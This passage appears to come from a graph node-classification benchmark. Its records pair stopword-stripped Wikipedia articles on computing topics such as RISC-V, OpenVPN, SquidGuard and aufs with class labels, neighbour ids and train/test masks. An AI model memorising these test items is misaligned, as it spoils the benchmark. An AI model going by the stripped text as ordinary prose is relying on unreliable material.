variable-width extensible encoding bits always added space 128-bit stretched version isa reserved 60 years industry experience shown unrecoverable error instruction set design lack memory address space 128-bit isa remains undefined intentionally yet little practical experience large memory systems proposals implement variable-width instructions 864-bits risc-v also supports designers academic uses simplicity integer subset permits basic student exercises integer subset simple isa enabling software control research machines variable-length isa enables extensions student exercises research separated privileged instruction set permits research operating system support without redesigning compilers risc-v open intellectual property allows designs published reused modified normal problem new instruction set lack cpu designs software issues limit usability reduce adoption risc-v website specification user-mode instructions preliminary specification general-purpose privileged instruction set support operating systems several open-sourced risc-v cpu designs including 64-bit berkeley order machine boom 64-bit rocket five 32-bit sodor cpu designs berkeley picorv32 clifford wolf scr1 syntacore pulpino riscy zero-riscy eth zürich university bologna others three-stage sodor cpu appears apt small embedded cpu rocket may suit compact low-power intermediate computers personal devices boom uses much infrastructure created rocket may usable personal supercomputer warehouse-scale computers picorv scr1 32-bit microcontroller unit mcu class rv32imc implementations verilog cores pulpino implement simple rv32imc isa micro-controllers zero-riscy powerful rv32imfc isa custom dsp extensions embedded signal processing design software includes design compiler chisel reduce designs verilog use devices website includes verification data testing core implementations available risc-v software tools include gnu compiler collection gcc toolchain gdb debugger llvm toolchain ovpsim simulator library risc-v fast processor models spike simulator simulator qemu operating system support exists linux kernel freebsd netbsd supervisor-mode instructions unstandardized prior june 2019 support provisional preliminary freebsd port risc-v architecture upstreamed february 2016 shipped freebsd 11.0 ports debian fedora stabilizing port das u-boot exists uefi spec v2.7 defined risc-v binding tianocore port done hpe engineers expected upstreamed preliminary port sel4 microkernel simulator exists run risc-v linux system web browser using javascript hex five released first secure iot stack risc-v freertos support also see comparison real-time operating systems risc-v modular design consisting alternative base parts added optional extensions isa base extensions developed collective effort industry research community educational institutions base specifies instructions encoding control flow registers sizes memory addressing logic i.e. integer manipulation ancillaries base alone implement simplified general-purpose computer full software support including general-purpose compiler standard extensions specified work standard bases without conflict many risc-v computers might implement compact extension reduce power consumption code size memory use also future plans support hypervisors virtualization together supervisor instruction set extension rvgc defines instructions needed conveniently support operating system unix-style portable operating system interface posix tame combinations functionality may implemented nomenclature defined specify instruction set base specified first coding risc-v register bit-width variant e.g. rv64i rv32e follows letters specifying implemented extensions canonical order base extended integer floating point calculations synchronisation primitives multi-core computing base extensions mafd considered necessary general-purpose computation thus shorthand g. small 32-bit computer embedded system might rv32ec large 64-bit computer might rv64gc i.e. shorthand rv64imafdc naming scheme zxxx standard extensions yxxx non-standard vendor-specific extensions proposed example ztso extension total store ordering alternative memory consistency model weak memory ordering discussion risc-v 32 16 embedded variant integer registers floating-point extension implemented 32 floating-point registers except memory access instructions instructions address registers first integer register zero register remainder general-purpose registers store zero register effect read always provides 0 using zero register placeholder makes simpler instruction set control status registers exist user-mode programs access used performance measurement floating-point management instructions exist save restore multiple registers thought needless complex perhaps slow like many risc designs risc-v load–store architecture instructions address registers load store instructions conveying memory load store instructions include 12-bit offset two register identifiers one register base register register source write destination read offset added base register get address forming address base register plus offset allows single instructions access data structures example base register points top stack single instructions access subroutine local variables stack likewise load store instructions access record-style structure memory-mapped i/o device using constant zero register base address allows single instructions access memory around address zero memory addressed 8-bit bytes words little-endian order words register size accessed load store instructions accessed memory addresses need aligned word-width accesses aligned addresses may faster example simple cpus may implement unaligned accesses slow software emulation driven alignment failure interrupt risc-v manages memory systems shared cpus threads ensuring thread execution always sees memory operations programmed order threads i/o devices risc-v simplified n't guarantee order memory operations except specific instructions instruction guarantees results predecessor operations visible successor operations threads i/o devices guarantee order combinations memory memory-mapped i/o operations e.g separate memory read write operations without affecting i/o operations system operate i/o devices parallel memory n't force wait one cpu one thread may decode like many risc instruction sets complex instruction set computer cisc instruction sets x86 ibm system/360 families risc-v lacks address-modes write back registers example auto-increment risc-v little-endian resemble familiar successful computers example x86 also reduces cpu complexity costs slightly reads sizes words order example risc-v instruction set decodes starting lowest-addressed byte instruction specification leaves open possibility non-standard big-endian bi-endian systems risc cpus mips powerpc dlx berkeley risc-i place 16 bits offset loads stores set upper 16 bits load upper word instruction permits upper-halfword values set easily without shifting bits however use upper half-word instruction makes 32-bit constants like addresses risc-v uses sparc-like combination 12-bit offsets 20-bit set upper instructions smaller 12-bit offset helps compact 32-bit load store instructions select two 32 registers yet still enough bits support risc-v variable-length instruction coding risc-v handles 32-bit constants addresses instructions set upper 20 bits 32-bit register load upper immediate loads 20 bits bits 31 12 second instruction set bottom 12 bits method extended permit position-independent code adding instruction generates 20 upper address bits adding offset program counter storing result base register permits program generate 32-bit addresses relative program counter base register often used as-is 12-bit offsets loads stores needed set lower 12-bits register 64-bit 128-bit isas sign-extend result get larger address fast cpus may interpret combinations instructions single fused instructions may good candidates fuse loads stores risc-v subroutine call jump link places return address register faster many computer designs saves memory access compared systems push return address directly stack memory 20-bit signed 2 complement offset offset multiplied 2 added pc generate relative address 32-bit instruction result 32-bit address i.e. evenly divisible 4 cpu may force exception risc-v cpus jump calculated addresses using jump link-register instruction similar gets destination address adding 12-bit offset base register contrast adds larger 20-bit offset pc bit format like register-relative loads stores like used instructions set upper 20 bits base register make 32-bit branches either absolute address using pc-relative one using position-independent code using constant zero base address allows single-instruction calls small offset fixed positive negative address risc-v recycles get unconditional 20-bit pc-relative jumps unconditional register-based 12-bit jumps jumps make linkage register 0 return address saved risc-v also recycles return subroutine base register set linkage register saved offset zero linkage register zero offset return address saved like many risc designs subroutine call risc-v compiler must use individual instructions save registers stack start restore stack exit risc-v save multiple restore multiple register instructions thought make cpu complex possibly slow take code space designers planned reduce code size library routines save restore registers risc-v condition code register carry bit designers believed condition codes make fast cpus complex forcing interactions instructions different stages execution choice makes multiple-precision arithmetic complex also numerical tasks need energy instead risc-v short branches perform comparisons equal not-equal less-than unsigned less-than greater-than equal unsigned greater-than equal ten comparison-branch operations implemented six instructions reversing order operands assembler example branch greater done less-than reversed order operands comparing branches twelve-bit signed range jump relative pc risc-v isa requires default branch predictions cpus backward conditional branches predicted taken forward conditional branches predict taken predictions easy decode pipelined cpu branch addresses signed numbers added pc backward branches negative two complement addresses thus one significant bit address forward branches zero significant bit fixed location operation code speed pipeline complex cpus add branch predictors work well even unusual data situations isa manual recommends software optimized avoid branch stalls using default branch predictions reuses significant bit signed relative address hint bit tell whether conditional branch taken hint bits needed operation codes risc-v branches makes bits available branch operation codes simple inexpensive cpus merely follow default predictions still perform well optimizing compilers compilers still perform statistical path optimization desired avoid needless loading branch prediction electronics thus needless pipeline stalls comparing branch codes never used unconditional jumps risc-v support predication conditional execution instructions designers claim cpus without predication easier design optimizing compilers less likely mistakenly use predication used designers claim fast out-of-order cpu designs predication anyway comparison branch conditional code parallel discarding unused path effects also claim even simpler cpus predication less valuable branch prediction prevent stalls associated conditional branches code without predication larger branches also claim compressed instruction set risc-v set c solves problem cases many risc designs included branch delay slot position branch instruction filled instruction executed whether branch taken feature improve performance pipelined cpus absorbing time wasted cpu mispredicts operation conditional branch cpu pipeline stalls risc-v omits branch delay slot complicates multicycle cpus superscalar cpus long pipelines dynamic branch predictors succeeded well enough reduce need delayed branches risc-v segregates math minimal set integer instructions set add subtract shift bit-wise logic comparing-branches simulate risc-v instruction sets software atomic instructions notable exception risc-v currently lacks count leading zero bit-field operations normally used speed software floating-point pure-integer processor integer multiplication instructions set includes signed unsigned multiply divide double-precision integer multiplies divides included multiplies divides produce high word result isa document recommends implementors cpus compilers fuse standardized sequence high low multiply divide instructions one operation possible floating-point instructions set f includes single-precision arithmetic also comparison-branches similar integer arithmetic requires additional set 32 floating-point registers separate integer registers double-precision floating point instructions set generally assume floating-point registers 64-bit i.e. double-width f subset coordinated set quad-precision 128-bit floating-point isa q also defined risc-v computers without floating-point use floating-point software library risc-v cause exceptions arithmetic errors including overflow underflow subnormal divide zero instead integer floating-point arithmetic produce reasonable default values set status bits divide-by-zero discovered one branch division status bits tested operating system periodic interrupt risc-v supports computers share memory multiple cpus threads risc-v standard memory consistency model release consistency loads stores may generally reordered loads may designated acquire operations must precede later memory accesses stores may designated release operations must follow earlier memory accesses base instruction set includes minimal support form instruction enforce memory ordering although sufficient provides acquire provides release combined operations efficient atomic memory operation extension supports two types atomic memory operations release consistency first provides general purpose load-reserved store-conditional instructions performs load tries reserve address thread later store-conditional reserved address performed reservation broken intervening store another source store succeeds zero placed register failed non-zero value indicates software needs retry operation either case reservation released second group atomic instructions perform read-modify-write sequences load optionally load-acquire destination register operation loaded value source register store result may optionally store-release making memory barriers optional permits combining operations optional operations enabled acquire release bits present every atomic instruction risc-v defines nine possible operations swap use source register value directly add bitwise exclusive-or signed unsigned minimum maximum system design may optimize combined operations example destination register swap constant zero load may skipped value stored unmodified since load store may skipped ibm system/370 successors including z/architecture x86 implement compare-and-swap instruction tests conditionally updates location memory location contains expected old value replaces given new value returns indication whether made change however simple load-type instruction usually performed fetch old value classic problem thread reads loads value calculates new value c uses replace c way know whether concurrent activity another thread replaced value b restored algorithms e.g. ones values memory pointers dynamically allocated blocks aba problem lead incorrect results common solution employs double-wide instruction update pointer adjacent counter unfortunately instruction requires special instruction format specify multiple registers performs several reads writes complex bus operation alternative efficient usually requires one memory load minimizing slow memory operations desirable also exact controls accesses memory cell rather assuring bit pattern however unlike permit livelock two threads repeatedly cause instructions fail risc-v guarantees forward progress livelock code follows rules timing sequence instructions 1 must use subset 2 prevent repetitive cache misses code including retry loop must occupy 16 consecutive instructions 3 must include system fence instructions taken backward branches 4 backward branch retry loop must original sequence specification gives examples use subset lock data structure standard risc-v isa specifies instructions 32 bits makes particularly simple implementation like risc processors instruction encoding results larger code size instruction sets compensate risc-v 32-bit instructions actually 30 bits opcode space reserved optional recommended variable-length compressed instruction set rvc includes 16-bit instructions like arm thumb mips16 compressed instructions simply aliases subset larger instructions unlike arm thumb mips compressed set space reserved beginning separate operating mode standard compressed instructions may intermixed freely letter c like thumb-1 mips16 compressed instructions simply alternate encodings aliases selected subset larger instructions compression implemented assembler essential compiler even know prototype rvc tested 2011 prototype code 20 smaller x86 pc mips compressed code 2 larger arm thumb-2 code also substantially reduced needed cache memory estimated power use memory system researcher intended reduce code binary size small computers especially embedded computer systems prototype included 33 frequently used instructions recoded compact 16-bit formats using operation codes previously reserved compressed set compression done assembler changes compiler compressed instructions omitted fields often zero used small immediate values accessed subsets 16 8 registers common often compressible much difference size compared arm thumb set occurred risc-v prototype instructions save restore multiple registers instead compiler generated conventional instructions access stack prototype rvc assembler often converted compressed forms half size however still took code space arm instructions save restore multiple registers researcher proposed modify compiler call library routines save restore registers routines would tend remain code cache thus run fast though probably fast save-multiple instruction standard rvc requires occasional use 32-bit instructions several nonstandard rvc proposals complete requiring 32-bit instructions said higher densities standard rvc another proposal builds claims use less coding range well instruction set smallest embedded cpus set e reduced ways 16 32-bit integer registers supported floating-point instructions supported specification forbids uneconomical floating-point software library must used compressed set c recommended privileged instruction set supports machine mode user mode memory schemes use base-and-bound address relocation discussion occurred microcontroller profile risc-v ease development deeply embedded systems centers faster simple c-language support interrupts simplified security modes simplified posix application binary interface correspondents also proposed smaller non-standard 16-bit rv16e isas several serious proposal would use 16-bit c instructions 8 × 16-bit registers april fools joke proposed practical arrangement utilize 16 × 16-bit integer registers standard eimc isas including 32-bit instructions joke propose bank-switching registers 32-bit cpu would clearly superior risc-v isa includes separate privileged instruction set specification version 1.11 ratified foundation version 1.11 specification supports several types computer systems correspond roughly systems four rings privilege security machine hypervisor supervisor user layer also expected thin layer standardized supporting software communicates more-privileged layer hardware overall plan isa make hypervisor mode orthogonal user supervisor modes basic feature configuration bit either permits supervisor-level code access hypervisor registers causes interrupt accesses bit lets supervisor mode directly handle hardware needed hypervisor simplifies type 2 hypervisor hosted operating system popular mode run warehouse-scale computers support type 1 unhosted hypervisors bit cause accesses interrupt hypervisor bit simplifies nesting hypervisors hypervisor runs hypervisor also said simplify supervisor code letting kernel use hypervisor features kernel code result hypervisor form isa supports five modes machine supervisor user supervisor-under-hypervisor user-under-hypervisor privileged instruction set specification explicitly defines hardware threads harts multiple hardware threads common practice more-capable computers one thread stalled waiting memory others often proceed hardware threads help make better use large number registers execution units fast out-of-order cpus finally hardware threads simple powerful way handle interrupts saving restoring registers required simply executing different hardware thread however hardware thread required risc-v computer thread zero existing control status register definitions support risc-v error memory exceptions small number interrupts systems interrupts specification also defines interrupt controller interrupts always start highest-privileged machine level control registers level explicit forwarding bits route interrupts less-privileged code example hypervisor need include software executes interrupt forward interrupt operating system instead set-up set bits forward interrupt several memory systems supported specification physical-only suited simplest embedded systems also three unix-style virtual memory systems memory cached mass-storage systems virtual memory systems three sizes addresses sized 32 39 48-bits virtual memory systems support 4 kib pages multilevel page-table trees use similar algorithms walk page table trees designed either hardware software page-table walking optionally reduce cost page table walks super-sized pages may leaf pages higher levels system page table tree sv32 two layer page table tree supports 4 mib superpages sv39 three level page table supports 2 mib superpages 1 gib gigapages sv48 required support sv39 also 4-level page table supports 2 mib superpages 1 gib gigapages 512 gib terapages superpages aligned page boundaries next-lowest size page substantial work done produce preliminary though unapproved bit-manipulation b isa risc-v done well bit-manipulation subset aid cryptographic graphic mathematical operations criteria inclusion documented draft compliance rv5 philosophies isa formats substantial improvements code density speed i.e. least 3-for-1 reduction instructions substantial real-world applications including preexisting compiler support version 0.37 included uncontroversial instructions count leading zeros count one bits perform complement shift ones rotate generalized bit-reverse shuffle byte swaps bit extracts deposits bit-manipulation additions compressed set also includes controversial proposal bit-field extract place using nonstandard 48-bit instruction format simple cost-reduced risc-v systems proposal use floating-point registers bits perform parallel single instruction multiple data simd sub-word arithmetic widely used accelerate multimedia digital signal processing isa undefined could resemble pa-risc multimedia instructions multimedia acceleration extensions besides native 64-bit math pa-risc max2 cpu could arithmetic four 16-bit subwords several overflow methods also could move subwords different positions pa-risc max2 intentionally simplified lacked support 8-bit 32-bit subwords 16-bit subword size chosen support digital signal processing tasks instructions inexpensive design build however increased cpu performance digital signal processing tasks 48-fold enabling practical real-time video codecs 1995 proposed vector-processing instruction set may make packed simd set obsolete designers hope enough flexibility cpu implement vector instructions standard processor registers would enable minimal implementations similar performance multimedia isa however true vector coprocessor could execute code higher performance vector-processing proposal conservative flexible design general-purpose mixed-precision vector processor suitable execute compute kernels code would port easily cpus differing vector lengths ideally without recompiling contrast short-vector simd extensions less convenient used x86 arm pa-risc change word-width forces change instruction set expand vector registers case x86 64-bit mmx registers 128-bit streaming simd extensions sse 256-bit advanced vector extensions avx avx-512 result growing instruction set need port working code new instructions risc-v vector isa rather fix vector length architecture instruction available takes requested size sets vector length minimum hardware limit requested size risc-v proposal like cray long-vector design vector 32 vectors length application specifies total vector width requires processor determines vector length provide available on-chip resources takes form instruction four immediate operands specifying number vector registers available width needed total must addressable limit 32 may less application require vector length limited available on-chip storage divided number bytes storage needed entry added hardware limits may also exist turn may permit simd-style implementations outside vector loops application request zero-vector registers saving operating system work preserving context switches vector length architecturally variable designed vary run time also achieve flexibility instruction set likely use variable-width data paths variable-type operations using polymorphic overloading plan reduce size complexity isa compiler recent experimental vector processors variable-width data paths also show profitable increases operations per second speed area lower cost watt longer battery life unlike typical modern graphics processing unit plans provide special hardware support branch predication instead lower cost compiler-based predication used preliminary specification risc-v hardware-assisted debugger debugger use transport system joint test action group jtag universal serial bus usb access debug registers standard hardware debug interface may support either standardized abstract interface instruction feeding exact form abstract interface remains undefined proposals include memory mapped system standardized addresses registers debug devices command register data register accessible communication system correspondents claim similar systems used freescale background debug mode interface bdm cpus arm openrisc aeroflex leon instruction feeding cpu process debug exception execute individual instructions written register may supplemented data-passing register module directly access memory instruction feeding lets debugger access computer exactly software would also minimizes changes cpu adapts many types cpu said especially apt risc-v designed explicitly many types computers data-passing register allows debugger write data-movement loop ram execute loop move data computer speed near maximum speed debug system data channel correspondents say similar systems used mips technologies mips intel quark tensilica xtensa freescale power isa cpus background debug mode interface bdm",
    "neighbors": [
      7170,
      7173,
      9739,
      10767,
      7699,
      5655,
      10781,
      5663,
      10786,
      8231,
      10796,
      3630,
      4144,
      7218,
      11314,
      11322,
      6716,
      2623,
      6207,
      2113,
      7234,
      7235,
      11333,
      3142,
      3148,
      2638,
      3159,
      1122,
      10851,
      7269,
      1126,
      1638,
      3175,
      9320,
      11374,
      8815,
      7281,
      630,
      8822,
      11395,
      7313,
      1170,
      9368,
      9371,
      8861,
      6815,
      8352,
      5793,
      6818,
      4773,
      6821,
      6311,
      682,
      7852,
      4269,
      9391,
      3762,
      7858,
      9911,
      11447,
      8890,
      4286,
      2241,
      10945,
      2243,
      9928,
      9932,
      5329,
      7889,
      10966,
      731,
      11487,
      5861,
      7911,
      4841,
      10985,
      5355,
      9964,
      5358,
      1776,
      8944,
      5363,
      757,
      2805,
      10485,
      249,
      7936,
      8450,
      2821,
      1798,
      10508,
      6925,
      6926,
      6415,
      1298,
      11539,
      7445,
      6950,
      9003,
      3886,
      7983,
      11054,
      309,
      8501,
      823,
      5948,
      8508,
      4928,
      833,
      8514,
      6979,
      3911,
      6476,
      5457,
      7505,
      9044,
      11604,
      8543,
      1376,
      10603,
      8048,
      4465,
      372,
      5492,
      11125,
      1399,
      7033,
      1402,
      3451,
      3457,
      3462,
      3467,
      4493,
      398,
      3470,
      5523,
      409,
      415,
      1952,
      10658,
      3493,
      9126,
      9638,
      936,
      10669,
      1967,
      2480,
      11184,
      10675,
      1461,
      1462,
      1463,
      7607,
      8125,
      4030,
      8126,
      6084,
      3014,
      1480,
      5065,
      9163,
      6607,
      466,
      2517,
      9685,
      11221,
      4569,
      1499,
      477,
      1502,
      2529,
      5090,
      995,
      3050,
      9707,
      10734,
      6639,
      499,
      4596,
      2039,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 2225,
    "label": 9,
    "text": "Bigloo:bigloo bigloo programming language dialect language lisp implementation language scheme developed french research institute french institute research computer science automation inria oriented toward providing tools effective diverse code generation match performance hand-written c c++ bigloo system contains scheme compiler generate c code java virtual machine jvm .net framework .net bytecode lisp dialects contains interpreter also termed read-eval-print loop repl free open-source software run-time system libraries released gnu lesser general public license lgpl compiler programming tools released gnu general public license gpl bigloo scheme implementation devoted one goal enabling scheme based programming style c ++ usually required hop web application engine roadsend php written bigloo bigloo-lib project contains modules",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      3142,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      6797,
      9877,
      5803,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      5356,
      9964,
      4846,
      5360,
      5361,
      5872,
      8435,
      2804,
      9969,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      3408,
      6994,
      11090,
      1365,
      2392,
      8539,
      10083,
      6502,
      11625,
      7022,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      5546,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      5612,
      3573,
      7670,
      11255,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2226,
    "label": 3,
    "text": "Hardware_register:hardware register digital electronics especially computing hardware registers circuits typically composed flip flops often many characteristics similar memory distinguishing characteristic however also special hardware-related functions beyond ordinary memory depending point view hardware registers like memory additional hardware-related functions memory circuits like hardware registers store data hardware registers used interface software peripherals software writes send information device reads get information device hardware devices also include registers visible software internal use depending complexity modern hardware devices many registers standard integrated circuits typically document externally-exposed registers part electronic component datasheet typical uses hardware registers include reading hardware register peripheral units — computer hardware outside cpu — involves accessing memory-mapped i/o address port-mapped i/o address load store instruction issued processor hardware registers addressed words sometimes use bits word read written register commercial design tools simplify automate memory-mapped register specification code generation hardware firmware hardware verification testing documentation registers read/write read-only write-only write-only registers generally avoided suitable registers cause transient action written store persistent data read 'reset peripheral register may option designs afford gates relatively large logic circuit signal routing needed register data readback atari 2600 games console tia chip however write-only registers make debugging difficult lead read-modify-write problem read/write registers preferred pcs write-only registers made difficult advanced configuration power interface acpi determine device state entering sleep mode order restore state exiting sleep mode hardware registers inside central processing unit cpu called processor registers strobe registers interface normal hardware registers instead storing data trigger action time written rare cases read means signaling registers normally measured number bits hold example 8-bit register 32-bit register designers implement registers wide variety ways including addition programmer-visible registers read written software many chips internal microarchitectural registers used state machines pipelining example registered memory spirit ip-xact dita sidsc xml define standard xml formats memory-mapped registers",
    "neighbors": [
      7173,
      9739,
      7699,
      5655,
      6167,
      10781,
      8231,
      3630,
      9777,
      7218,
      2623,
      2113,
      7234,
      9794,
      3142,
      2638,
      3159,
      7772,
      1122,
      3175,
      8301,
      8815,
      630,
      8822,
      7313,
      9371,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      3788,
      5329,
      10966,
      731,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      1798,
      6926,
      6415,
      1298,
      6950,
      309,
      8501,
      4408,
      5948,
      4928,
      8514,
      8523,
      6476,
      5457,
      7505,
      9044,
      11604,
      7519,
      1376,
      8543,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      11645,
      3457,
      398,
      3470,
      5523,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      3014,
      466,
      10706,
      1499,
      1502,
      479,
      5598,
      5090,
      995,
      9707,
      10734,
      6639,
      499,
      4596,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 2227,
    "label": 4,
    "text": "SquidGuard:squidguard squidguard url redirector software used content control websites users access written plug-in squid uses blacklists define sites access redirected squidguard must installed unix linux computer server computer software filtering extends computers organization including windows macintosh computers originally developed pål baltzersen lars erik håland implemented extended lars erik håland 1990s tele danmark internordia version 1.4 current stable version released 2009 version 1.5 development 2010 new features version 1.4 included optional authentication via mysql database squidguard free software licensed gnu general public license gpl version 2 included many linux distributions including debian opensuse ubuntu url filtering capabilities squidguard depend largely quality blacklists used several options available free lists found shallalist.de université toulouse 1 capitole commercial lists found squidblacklist.org",
    "neighbors": [
      6797,
      7022,
      7983,
      5492,
      5012,
      823,
      5433,
      5407
    ],
    "mask": "Train"
  },
  {
    "node_id": 2228,
    "label": 4,
    "text": "OpenVPN:openvpn openvpn open-source commercial software implements virtual private network vpn techniques create secure point-to-point site-to-site connections routed bridged configurations remote access facilities uses custom security protocol utilizes ssl/tls key exchange capable traversing network address translators nats firewalls written james yonan published gnu general public license gpl openvpn allows peers authenticate using pre-shared secret keys certificates username/password used multiclient-server configuration allows server release authentication certificate every client using signatures certificate authority uses openssl encryption library extensively well tls protocol contains many security control features openvpn ported embedded several systems example dd-wrt openvpn server function softether vpn multi-protocol vpn server implementation openvpn protocol openvpn uses openssl library provide encryption data control channels lets openssl encryption authentication work allowing openvpn use ciphers available openssl package also use hmac packet authentication feature add additional layer security connection referred hmac firewall creator also use hardware acceleration get better encryption performance support mbed tls available starting version 2.3 openvpn several ways authenticate peers openvpn offers pre-shared keys certificate-based username/password-based authentication preshared secret key easiest certificate-based robust feature-rich version 2.0 username/password authentications enabled without certificates however make use username/password authentications openvpn depends third-party modules openvpn run user datagram protocol udp transmission control protocol tcp transports multiplexing created ssl tunnels single tcp/udp port rfc 3948 udp 2.3.x series openvpn fully supports ipv6 protocol virtual network inside tunnel openvpn applications also establish connections via ipv6 ability work proxy servers including http good working network address translation nat getting firewalls server configuration ability push certain network configuration options clients include ip addresses routing commands connection options openvpn offers two types interfaces networking via universal tun/tap driver create either based ip tunnel tun based ethernet tap carry type ethernet traffic openvpn optionally use lzo compression library compress data stream port 1194 official iana assigned port number openvpn newer versions program default port feature 2.0 version allows one process manage several simultaneous tunnels opposed original one tunnel per process restriction 1.x series openvpn use common network protocols tcp udp makes desirable alternative ipsec situations isp may block specific vpn protocols order force users subscribe higher-priced business grade service tier openvpn uses transmission control protocol tcp transports establish tunnel performance acceptable long sufficient excess bandwidth un-tunneled network link guarantee tunneled tcp timers expire becomes untrue performance falls dramatically known tcp meltdown problem openvpn offers various internal security features 256-bit encryption openssl library although service providers may offer lower rates effectively providing fastest vpn available consumers runs userspace instead requiring ip stack therefore kernel operation openvpn ability drop root privileges use mlockall prevent swapping sensitive data disk enter chroot jail initialization apply selinux context initialization openvpn runs custom security protocol based ssl tls rather support ike ipsec l2tp pptp openvpn offers support smart cards via pkcs 11-based cryptographic tokens openvpn extended third-party plug-ins scripts called defined entry points purpose often extend openvpn advanced logging enhanced authentication username passwords dynamic firewall updates radius integration plug-ins dynamically loadable modules usually written c scripts interface execute scripts binaries available openvpn openvpn source code examples plug-ins including pam authentication plug-in several third-party plug-ins also exist authenticate ldap sql databases sqlite mysql available solaris linux openbsd freebsd netbsd qnx macos windows xp later openvpn available mobile phone operating systems os including maemo windows mobile 6.5 ios 3gs+ devices jailbroken ios 3.1.2+ devices android 4.0+ devices android devices cyanogenmod aftermarket firmware flashed correct kernel module installed compatible mobile phone oses including palm os web-based vpn shown web page citrix terminal services web access program installed independently configured editing text files manually rather gui-based wizard openvpn compatible vpn clients use ipsec l2tp pptp protocols entire package consists one binary client server connections optional configuration file one key files depending authentication method used openvpn integrated several router firmware packages allowing users run openvpn client server mode network routers router running openvpn client mode example allows device network access vpn without needing capability install openvpn notable firmware packages openvpn integration include openvpn implemented manufacturer router firmware d-link dsr-250 mikrotik routers mikrotik implementation support udp protocol lzo compression limits transfer speeds attainable mikrotik said 2010 would continue developing openvpn favor secure socket tunneling protocol sstp openvpn integrated softether vpn open-source multi-protocol vpn server allow users connect vpn server existing openvpn clients openvpn also integrated vyos open-source routing os forked vyatta software router openvpn available two versions",
    "neighbors": [
      2050,
      517,
      3590,
      10254,
      9744,
      9745,
      8211,
      9764,
      1580,
      3629,
      569,
      2111,
      9281,
      8265,
      1101,
      2136,
      8283,
      2143,
      10851,
      9318,
      5749,
      6779,
      5254,
      10889,
      4746,
      8331,
      9868,
      1683,
      11413,
      8344,
      3742,
      11430,
      4268,
      10924,
      7857,
      10417,
      7859,
      3770,
      3777,
      10433,
      11468,
      7376,
      6364,
      2804,
      3322,
      5371,
      1814,
      10016,
      8998,
      813,
      823,
      5433,
      2884,
      2375,
      5959,
      10058,
      6993,
      4435,
      11606,
      9048,
      6490,
      4957,
      8039,
      7022,
      10631,
      4490,
      11162,
      1436,
      5546,
      6579,
      8640,
      11221,
      5084,
      10210,
      7139,
      11248,
      9722,
      6651,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2229,
    "label": 4,
    "text": "Mayfield's_paradox:mayfield paradox mayfield paradox states keep everyone information system requires infinite amount money get everyone onto information system also requires infinite money costs extremes relatively low paradox depicted u-curve cost system vertical axis percentage humanity access system horizontal axis acceptance paradox information security community immediate consistent professional experiences group mayfield paradox points point curve additional security becomes unrealistically expensive conversely point curve becomes unrealistically expensive add additional users based paradox menz brothers developed menz theorems information physical security theorems present two formulas covering access security information systems physical facilities used help determine allocation resources response levels",
    "neighbors": [
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 2230,
    "label": 6,
    "text": "Aufs:aufs aufs short advanced multi-layered unification filesystem implements union mount linux file systems name originally stood anotherunionfs version 2 developed junjiro okajima 2006 aufs complete rewrite earlier unionfs aimed improve reliability performance also introduced new concepts like writable branch balancing improvements – implemented unionfs 2.x branch aufs rejected merging mainline linux code criticized dense unreadable uncommented instead overlayfs merged linux kernel several attempts merge aufs mainline kernel author given aufs included debian jessie ubuntu 16.04 box debian stretch include aufs anymore provides package aufs-dkms auto-compiles aufs kernel module using dell dkms docker originally used aufs container filesystem layers still available one supported storage backends several linux distributions chosen aufs replacement unionfs including",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      10774,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      5721,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      1150,
      9343,
      8837,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      1199,
      7344,
      5816,
      4282,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      8957,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      2910,
      2914,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      1400,
      890,
      11128,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      9693,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 2231,
    "label": 2,
